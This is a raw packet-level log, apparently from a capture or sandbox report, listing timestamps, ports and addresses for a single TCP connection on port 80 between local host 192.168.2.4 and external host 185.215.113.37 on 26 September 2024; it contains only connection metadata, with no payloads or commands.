Sep 26, 2024 18:27:15.305797100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.305824995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.305830956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.305856943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.305860996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.305881023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.305893898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.305923939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.305954933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.305954933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.305979013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.305984020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.306014061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.306018114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.306039095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.306050062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.306058884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.306082964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.306098938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.306113958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.306121111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.306147099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.306164980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.306179047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.306195021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.306211948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.306232929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.306246042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.306263924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.306292057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.306794882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.306839943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.306840897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.306874990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.306890011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.306906939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.306925058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.306940079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.306971073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.306992054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.307004929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.307030916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.307038069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.307065010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.307070971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.307085037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.307102919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.307135105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.307156086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.307167053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.307193995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.307199955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.307224989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.307233095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.307245970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.307265997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.307277918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.307297945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.307307959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.307331085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.307343960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.307368994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.307378054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.307414055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.307421923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.307456970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.307473898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.307488918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.307503939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.307519913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.307533979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.307553053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.307560921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.307598114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.309899092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.309931040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.309957027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.309962988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.309978008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.309997082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.310010910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.310024977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.310051918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.310055971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.310070992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.310089111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.310133934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.310139894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.310168028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.310172081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.310192108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.310204029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.310231924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.310260057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.360533953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.360672951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.360708952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.360769987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.399846077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.399883986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.399918079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.400176048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.400176048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.402120113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.402154922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.402235031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.424493074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.424527884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.424614906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.424680948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.424727917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.424793005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.424840927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.424874067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.424895048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.424906969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.424932957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.424941063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.424968958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.424994946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.425829887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.425862074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.425889015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.425894022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.425920010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.425926924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.425951004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.425959110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.425977945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.425992966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426026106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426045895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.426058054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426084995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.426091909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426120043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.426125050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426142931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.426163912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426217079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.426573038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426604986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426635981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426656008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.426668882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426696062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.426717997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426732063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.426749945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426772118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.426781893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426800013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.426815987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426831961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.426847935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426878929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426893950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.426913977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426939964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.426948071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426963091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.426980019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.426995993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.427014112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.427026987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.427046061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.427059889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.427078009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.427093983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.427109957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.427125931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.427141905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.427155972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.427174091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.427189112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.427206039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.427222013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.427237034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.427253962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.427269936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.427299023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.427333117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.427954912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.427985907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428018093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428019047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428049088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428049088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428086042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428092957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428105116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428141117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428142071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428177118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428190947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428208113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428222895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428241014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428258896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428273916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428287983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428306103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428320885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428334951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428358078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428366899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428390980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428482056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428498030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428515911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428530931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428548098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428561926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428581953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428601027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428615093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428647041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428648949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428658962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428678989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428694010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428710938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428744078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428769112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428772926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428805113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428824902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428824902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428836107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428836107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.428862095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.428883076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.430576086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.430608988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.430640936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.430672884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.430705070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.430732965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.430737972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.430771112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.430777073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.430803061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.430803061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.430835962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.430838108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.430870056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.430871010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.430885077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.430905104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.430937052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.430957079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.430969000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.430993080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.431031942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.431034088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.431066036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.431086063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.431097984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.431109905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.431130886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.431145906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.431168079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.431175947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.431222916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.488377094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.488442898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.488533020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.488586903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.518126965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.518213987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.518241882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.518258095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.518296003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.518323898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.518419981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.518451929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.518513918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.543423891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.543483973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.543564081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.543579102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.543593884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.543606997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.543617964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.543622017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.543637037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.543653011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.543663979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.543688059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.543721914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.543725967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.543741941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.543773890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.543798923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.543807983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.543822050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.543837070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.543850899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.543864012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.543870926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.543880939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.543911934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.543932915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.544137955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.544158936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.544173956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.544187069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.544188976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.544202089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.544212103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.544217110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.544231892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.544248104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.544248104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.544275999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.544297934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.544928074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.544958115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.544989109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.545022011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.545022011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.545053005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.545074940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.545089006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.545109034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.545124054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.545140982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.545172930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.545183897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.545206070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.545209885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.545232058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.545279980 CEST	49730	80	192.168.2.4	185.215.113.37
